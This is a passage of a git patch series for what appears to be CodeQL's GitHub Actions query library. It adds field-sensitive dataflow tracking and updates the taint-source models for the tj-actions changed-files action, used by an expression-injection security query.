files"] - - ["tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 076ecff353c..408abfbb8d0 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files"] - - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] From e6b4676f9086d10bae70eb380bca48fa635eaf96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 10:47:00 +0100 Subject: [PATCH 0029/1267] feat(field-flow): enhance dataflow tracking implement field flow to reduce false positives --- ql/lib/codeql/actions/Ast.qll | 146 +++++++++++++----- .../codeql/actions/ast/internal/Actions.qll | 6 +- .../codeql/actions/dataflow/ExternalFlow.qll | 76 +++++++-- .../codeql/actions/dataflow/FlowSources.qll | 34 +--- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 59 ++----- .../dataflow/internal/DataFlowPrivate.qll | 116 +++++++++++--- .../dataflow/internal/DataFlowPublic.qll | 47 ++++-- ql/lib/ext/tj-actions-changed-files.model.yml | 46 +++--- .../Security/CWE-094/ExpressionInjection.ql | 4 +- ql/src/test/.github/workflows/ci-cleanup.yml | 47 ------ .../workflows/image_link_generator.yml | 24 +-- .../workflows/image_link_generator_2.yml | 61 -------- .../workflows/image_link_generator_3.yml | 27 ---- .../workflows/{inter1.yml => inter-job.yml} | 0 ql/src/test/.github/workflows/simple1.yml | 9 +- ql/src/test/.github/workflows/simple2.yml | 6 + ql/src/test/.github/workflows/test.yml | 7 +- 17 files changed, 377 insertions(+), 338 deletions(-) delete mode 100644 ql/src/test/.github/workflows/ci-cleanup.yml delete mode 100644 ql/src/test/.github/workflows/image_link_generator_2.yml delete mode 100644 ql/src/test/.github/workflows/image_link_generator_3.yml rename ql/src/test/.github/workflows/{inter1.yml => inter-job.yml} (100%) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 6307897685f..087b7f19e62 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -95,6 +95,8 @@ class OutputsStmt extends Statement instanceof YamlMapping { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or this.(YamlMapping).lookup(name) = result } + + string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } class InputExpr extends Expression instanceof YamlString { @@ -158,6 +160,10 @@ class JobStmt extends Statement instanceof Actions::Job { * arg1: value1 */ JobUsesExpr getUsesExpr() { result.getJobStmt() = this } + + predicate usesReusableWorkflow() { + this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) + } } /** @@ -353,26 +359,51 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJobStmt() { result.getAChildNode*() = this } +} + +/** + * A context access expression. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +class CtxAccessExpr extends ExprAccessExpr { + CtxAccessExpr() { + expr.regexpMatch([ + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex() + ]) + } + + abstract string getFieldName(); abstract Expression getRefExpr(); } +private string stepsCtxRegex() { result = "steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string needsCtxRegex() { result = "needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string jobsCtxRegex() { result = "jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string envCtxRegex() { result = "env\\.([A-Za-z0-9_-]+)" } + +private string inputsCtxRegex() { result = "inputs\\.([A-Za-z0-9_-]+)" } + /** - * Holds for an ExprAccessExpr accesing the `steps` context. + * Holds for an expression accesing the `steps` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepOutputAccessExpr extends ExprAccessExpr { +class StepsCtxAccessExpr extends CtxAccessExpr { string stepId; - string varName; + string fieldName; - StepOutputAccessExpr() { - stepId = - this.getExpression().regexpCapture("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and - varName = - this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + StepsCtxAccessExpr() { + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { this.getLocation().getFile() = result.getLocation().getFile() and result.(StepStmt).getId() = stepId @@ -380,79 +411,112 @@ class StepOutputAccessExpr extends ExprAccessExpr { } /** - * Holds for an ExprAccessExpr accesing the `needs` or `job` contexts. + * Holds for an expression accesing the `needs` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ needs.job1.outputs.foo}}` or `${{ jobs.job1.outputs.foo}}` (for reusable workflows) + * e.g. `${{ needs.job1.outputs.foo}}` */ -class JobOutputAccessExpr extends ExprAccessExpr { +class NeedsCtxAccessExpr extends CtxAccessExpr { + JobStmt job; string jobId; - string varName; + string fieldName; - JobOutputAccessExpr() { - jobId = - this.getExpression() - .regexpCapture("(needs|jobs)\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 2) and - varName = - this.getExpression() - .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) + NeedsCtxAccessExpr() { + expr.regexpMatch(needsCtxRegex()) and + jobId = expr.regexpCapture(needsCtxRegex(), 1) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + job.getId() = jobId } + predicate usesReusableWorkflow() { job.usesReusableWorkflow() } + + override string getFieldName() { result = fieldName } + + override Expression getRefExpr() { + job.getLocation().getFile() = this.getLocation().getFile() and + ( + // regular jobs + job.getOutputStmt().getOutputExpr(fieldName) = result + or + // jobs calling reusable workflows + job.getUsesExpr() = result + ) + } +} + +/** + * Holds for an expression accesing the `jobs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) + */ +class JobsCtxAccessExpr extends CtxAccessExpr { + string jobId; + string fieldName; + + JobsCtxAccessExpr() { + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + } + + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - ( - // A Job can have multiple outputs, so we need to check both - // jobs..outputs. - job.getOutputStmt().getOutputExpr(varName) = result - or - // jobs..uses (variables returned from the reusable workflow - job.getUsesExpr() = result - ) + job.getOutputStmt().getOutputExpr(fieldName) = result ) } } /** - * Holds for an ExprAccessExpr accesing the `inputs` context. + * Holds for an expression the `inputs` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputAccessExpr extends ExprAccessExpr { - string paramName; +class InputsCtxAccessExpr extends CtxAccessExpr { + string fieldName; - InputAccessExpr() { - paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) + InputsCtxAccessExpr() { + expr.regexpMatch(inputsCtxRegex()) and + fieldName = expr.regexpCapture(inputsCtxRegex(), 1) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputsStmt().getInputExpr(paramName) = result + w.getInputsStmt().getInputExpr(fieldName) = result ) or exists(CompositeActionStmt a | a.getLocation().getFile() = this.getLocation().getFile() and - a.getInputsStmt().getInputExpr(paramName) = result + a.getInputsStmt().getInputExpr(fieldName) = result ) } } /** - * Holds for an ExprAccessExpr accesing the `env` context. + * Holds for an expression accesing the `env` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvAccessExpr extends ExprAccessExpr { - string varName; +class EnvCtxAccessExpr extends CtxAccessExpr { + string fieldName; - EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } + EnvCtxAccessExpr() { + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } override Expression getRefExpr() { - exists(JobUsesExpr s | s.getEnvExpr(varName) = result) + exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) or - exists(StepUsesExpr s | s.getEnvExpr(varName) = result) + exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) or - exists(RunExpr s | s.getEnvExpr(varName) = result) + exists(RunExpr s | s.getEnvExpr(fieldName) = result) } } diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index a11759b0c93..2fb17eef88b 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -294,8 +294,10 @@ module Actions { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ string getGitHubRepository() { result = - this.getValue().regexpCapture(usesParser(), 1) + "/" + - this.getValue().regexpCapture(usesParser(), 2) + ( + this.getValue().regexpCapture(usesParser(), 1) + "/" + + this.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index b19fbcbaca6..c2da24ba52c 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,21 +2,31 @@ private import internal.ExternalFlowExtensions as Extensions import codeql.actions.DataFlow import actions -/** Holds if a source model exists for the given parameters. */ +/** + * MaD sources + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - output arg: To node (prefixed with either `env.` or `output.`) + * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + */ predicate sourceModel(string action, string version, string output, string trigger, string kind) { Extensions::sourceModel(action, version, output, trigger, kind) } -/** Holds if a sink model exists for the given parameters. */ +/** + * MaD summaries + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: From node (prefixed with either `env.` or `input.`) + * - output arg: To node (prefixed with either `env.` or `output.`) + * - kind: Either 'Taint' or 'Value' + */ predicate summaryModel(string action, string version, string input, string output, string kind) { Extensions::summaryModel(action, version, input, output, kind) } -/** Holds if a sink model exists for the given parameters. */ -predicate sinkModel(string action, string version, string input, string kind) { - Extensions::sinkModel(action, version, input, kind) -} - /** * MaD sinks * Fields: @@ -25,7 +35,55 @@ predicate sinkModel(string action, string version, string input, string kind) { * - input arg: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind */ -predicate sinkNode(DataFlow::ExprNode sink, string kind) { +predicate sinkModel(string action, string version, string input, string kind) { + Extensions::sinkModel(action, version, input, kind) +} + +predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { + exists(UsesExpr uses, string action, string version, string trigger, string kind | + sourceModel(action, version, fieldName, trigger, kind) and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if fieldName.trim().matches("env.%") + then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env\\.", "")) + else + if fieldName.trim().matches("output.%") + then + // 'output.' is the default qualifier + source.asExpr() = uses + else none() + ) and + sourceType = kind + ) +} + +predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(UsesExpr uses, string action, string version, string input, string output | + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and + summaryModel(action, version, input, output, "taint") and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if input.trim().matches("env.%") + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + else + // 'input.' is the default qualifier + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) + ) and + succ.asExpr() = uses + ) +} + +predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | ( if input.trim().matches("env.%") @@ -33,7 +91,7 @@ predicate sinkNode(DataFlow::ExprNode sink, string kind) { else sink.asExpr() = uses.getArgumentExpr(input.trim()) ) and sinkModel(action, version, input, kind) and - uses.getCallee() = action and + uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" then uses.getVersion() = any(string v) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index fae6c74b0b3..2b35b2f332f 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -126,40 +126,14 @@ private class EventSource extends RemoteFlowSource { } /** - * MaD sources - * Fields: - * - action: Fully-qualified action name (NWO) - * - version: Either '*' or a specific SHA/Tag - * - output arg: To node (prefixed with either `env.` or `output.`) - * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + * A Source of untrusted data defined in a MaD specification */ private class ExternallyDefinedSource extends RemoteFlowSource { - string soutceType; + string sourceType; - ExternallyDefinedSource() { - exists( - UsesExpr uses, string action, string version, string output, string trigger, string kind - | - sourceModel(action, version, output, trigger, kind) and - uses.getCallee() = action and - ( - if version.trim() = "*" - then uses.getVersion() = any(string v) - else uses.getVersion() = version.trim() - ) and - ( - if output.trim().matches("env.%") - then this.asExpr() = uses.getEnvExpr(output.trim().replaceAll("output\\.", "")) - else - // 'output.' is the default qualifier - // TODO: Taint just the specified output - this.asExpr() = uses - ) and - soutceType = kind - ) - } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } - override string getSourceType() { result = soutceType } + override string getSourceType() { result = sourceType } } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 750a4011320..9def461900e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -21,42 +21,11 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * MaD summaries - * Fields: - * - action: Fully-qualified action name (NWO) - * - version: Either '*' or a specific SHA/Tag - * - input arg: From node (prefixed with either `env.` or `input.`) - * - output arg: To node (prefixed with either `env.` or `output.`) - * - kind: Either 'Taint' or 'Value' - */ -predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesExpr uses, string action, string version, string input | - // `output` not used yet - summaryModel(action, version, input, _, "taint") and - uses.getCallee() = action and - ( - if version.trim() = "*" - then uses.getVersion() = any(string v) - else uses.getVersion() = version.trim() - ) and - ( - if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) - else - // 'input.' is the default qualifier - pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) - ) and - succ.asExpr() = uses - ) -} - -private class ExternallyDefinedSummary extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - externallyDefinedSummary(pred, succ) - } -} - +// private class RunEnvToScriptStep extends AdditionalTaintStep { +// override predicate step(DataFlow::Node pred, DataFlow::Node succ) { +// runEnvToScriptstep(pred, succ) +// } +// } /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. @@ -68,23 +37,21 @@ private class ExternallyDefinedSummary extends AdditionalTaintStep { * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') * echo "Cleaned Initial URL: $INITIAL_URL" * echo "::set-output name=initial_url::$INITIAL_URL" + * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT + * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" */ -private class RunEnvToScriptStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - runEnvToScriptstep(pred, succ) - } -} - -predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { - exists(RunExpr r, string varName | +predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(RunExpr r, string varName, string output | + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | script = r.getScript() and line = script.splitAt("\n") and ( - line.regexpMatch(".*::set-output\\s+name.*") or - line.regexpMatch(".*>>\\s*\\$GITHUB_OUTPUT.*") + output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or + output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) ) and + // TODO: repalce script with line below script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 79bd48b395a..55fda038789 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -4,6 +4,8 @@ private import codeql.actions.Cfg as Cfg private import codeql.Locations private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.FlowSteps cached newtype TNode = TExprNode(DataFlowExpr e) @@ -129,25 +131,43 @@ predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } -private newtype TContent = TNoContent() { none() } +newtype TContent = + TFieldContent(string name) { + name = any(StepsCtxAccessExpr a).getFieldName() or + name = any(NeedsCtxAccessExpr a).getFieldName() or + name = any(JobsCtxAccessExpr a).getFieldName() + } +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ class Content extends TContent { + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } + /** Gets a textual representation of this element. */ - string toString() { none() } + abstract string toString(); + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } } -predicate forceHighPrecision(Content c) { none() } +predicate forceHighPrecision(Content c) { c instanceof FieldContent } -newtype TContentSet = TNoContentSet() { none() } +class ContentApprox = ContentSet; -private newtype TContentApprox = TNoContentApprox() { none() } - -class ContentApprox extends TContentApprox { - /** Gets a textual representation of this element. */ - string toString() { none() } -} - -ContentApprox getContentApprox(Content c) { none() } +ContentApprox getContentApprox(Content c) { result = c } /** * Made a string to match the ArgumentPosition type. @@ -169,11 +189,15 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = /** * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself + * But only for those cases where the step output is defined externally in a MaD specification. + * The reason for this is that we don't currently have a way to specify that a source starts with a non-empty access + * path so the easiest thing is to add the corresponding read steps of that field as local flow steps as well. * e.g. ${{ steps.step1.output.foo }} */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(StepStmt astFrom, StepOutputAccessExpr astTo | - (astFrom instanceof UsesExpr or astFrom instanceof RunExpr) and + exists(StepStmt astFrom, StepsCtxAccessExpr astTo | + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom instanceof UsesExpr and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -182,13 +206,14 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { /** * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself - * e.g. ${{ needs.job1.output.foo }} or ${{ job.job1.output.foo }} + * e.g. ${{ needs.job1.output.foo }} or ${{ jobs.job1.output.foo }} */ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, JobOutputAccessExpr astTo | + exists(Expression astFrom, CtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getRefExpr() = astFrom and + (astTo instanceof NeedsCtxAccessExpr or astTo instanceof JobsCtxAccessExpr) ) } @@ -197,7 +222,7 @@ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, InputAccessExpr astTo | + exists(Expression astFrom, InputsCtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -209,10 +234,13 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvAccessExpr astTo | + exists(Expression astFrom, EnvCtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + ( + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + astTo.getRefExpr() = astFrom + ) ) } @@ -244,19 +272,63 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } +/** + * A read step to read the value of a ReusableWork uses step and connect it to its + * corresponding JobOutputAccessExpr + */ +predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { + exists(NeedsCtxAccessExpr expr, string fieldName | + expr.usesReusableWorkflow() and + expr.getRefExpr() = node1.asExpr() and + expr.getFieldName() = fieldName and + expr = node2.asExpr() and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} + /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. */ -predicate readStep(Node node1, ContentSet c, Node node2) { none() } +predicate readStep(Node node1, ContentSet c, Node node2) { + // TODO: Extract to its own predicate + exists(StepsCtxAccessExpr access | + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getRefExpr() and + node2.asExpr() = access + ) + or + reusableWorkflowReturnReadStep(node1, node2, c) +} + +/** + * A store step to store the value of a ReusableWorkflowStmt output expr into the return node (node2) + * with a given access path (fieldName) + */ +predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) { + exists(ReusableWorkflowStmt stmt, OutputsStmt out, string fieldName | + out = stmt.getOutputsStmt() and + node1.asExpr() = out.getOutputExpr(fieldName) and + node2.asExpr() = out and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} /** * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, * `node2` references an object with a content `c.getAStoreContent()` that * contains the value of `node1`. */ -predicate storeStep(Node node1, ContentSet c, Node node2) { none() } +predicate storeStep(Node node1, ContentSet c, Node node2) { + reusableWorkflowReturnStoreStep(node1, node2, c) + or + // TODO: rename to xxxxStoreStep + externallyDefinedSummary(node1, node2, c) + or + // TODO: rename to xxxxStoreStep + runEnvToScriptstep(node1, node2, c) +} /** * Holds if values stored inside content `c` are cleared at node `n`. For example, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 0204015ac22..52101c7e5a7 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -83,18 +83,18 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private OutputExpr output; + private OutputsStmt outputs; ReturnNode() { - this.asExpr() = output and - output = any(OutputsStmt s).getOutputExpr(_) + this.asExpr() = outputs and + outputs = any(ReusableWorkflowStmt s).getOutputsStmt() } ReturnKind getKind() { result = TNormalReturn() } - override string toString() { result = "output " + output.toString() } + override string toString() { result = "output " + outputs.toString() } - override Location getLocation() { result = output.getLocation() } + override Location getLocation() { result = outputs.getLocation() } } /** Gets the node corresponding to `e`. */ @@ -106,13 +106,38 @@ Node exprNode(DataFlowExpr e) { result = TExprNode(e) } * The set may be interpreted differently depending on whether it is * stored into (`getAStoreContent`) or read from (`getAReadContent`). */ -class ContentSet extends TContentSet { - /** Gets a textual representation of this element. */ - string toString() { none() } - +class ContentSet instanceof Content { /** Gets a content that may be stored into when storing into this set. */ - Content getAStoreContent() { none() } + Content getAStoreContent() { result = this } /** Gets a content that may be read from when reading from this set. */ - Content getAReadContent() { none() } + Content getAReadContent() { result = this } + + /** Gets a textual representation of this content set. */ + string toString() { result = super.toString() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + super.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } +} + +/** A field of an object, for example an instance variable. */ +class FieldContent extends Content, TFieldContent { + private string name; + 